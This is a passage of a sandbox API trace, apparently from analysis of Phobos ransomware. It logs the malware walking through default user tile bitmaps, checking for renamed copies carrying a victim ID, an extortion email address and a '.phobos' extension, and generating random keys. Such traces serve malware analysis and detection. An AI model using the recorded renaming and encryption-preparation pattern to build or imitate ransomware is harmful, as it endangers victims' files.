returned 1 [0145.916] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.916] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.916] CloseHandle (hObject=0x138) returned 1 [0145.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp")) returned 0x20 [0145.916] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.917] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=48824) returned 1 [0145.917] CloseHandle (hObject=0x138) returned 1 [0145.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp")) returned 0x20 [0145.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.918] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.918] CloseHandle (hObject=0x138) returned 1 [0145.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp")) returned 0x20 [0145.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.918] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.918] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.918] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.918] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.918] CloseHandle (hObject=0x138) returned 1 [0145.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp")) returned 0x20 [0145.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.918] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.919] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.919] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.919] CloseHandle (hObject=0x138) returned 1 [0145.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp")) returned 0x20 [0145.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.919] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.919] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.920] CloseHandle (hObject=0x138) returned 1 [0145.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp")) returned 0x20 [0145.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.920] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.920] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.920] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.920] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.920] CloseHandle (hObject=0x138) returned 1 [0145.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp")) returned 0x20 [0145.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.920] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.921] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.921] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.921] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.921] CloseHandle (hObject=0x138) returned 1 [0145.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp")) returned 0x20 [0145.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.921] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.921] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.921] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.923] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.923] CloseHandle (hObject=0x138) returned 1 [0145.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp")) returned 0x20 [0145.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.924] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.924] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.924] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.924] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.924] CloseHandle (hObject=0x138) returned 1 [0145.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp")) returned 0x20 [0145.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.924] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.924] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.924] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.925] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.925] CloseHandle (hObject=0x138) returned 1 [0145.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp")) returned 0x20 [0145.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.925] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.925] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.925] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.925] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.925] CloseHandle (hObject=0x138) returned 1 [0145.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp")) returned 0x20 [0145.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.926] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.926] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.926] CloseHandle (hObject=0x138) returned 1 [0145.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp")) returned 0x20 [0145.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.926] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.927] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.927] CloseHandle (hObject=0x138) returned 1 [0145.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp")) returned 0x20 [0145.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.927] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.927] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.927] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.927] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.927] CloseHandle (hObject=0x138) returned 1 [0145.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp")) returned 0x20 [0145.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.927] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.928] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.928] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.928] CloseHandle (hObject=0x138) returned 1 [0145.928] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp")) returned 0x20 [0145.928] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.928] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.928] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.928] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.928] CloseHandle (hObject=0x138) returned 1 [0145.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp")) returned 0x20 [0145.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.929] CreateFileW 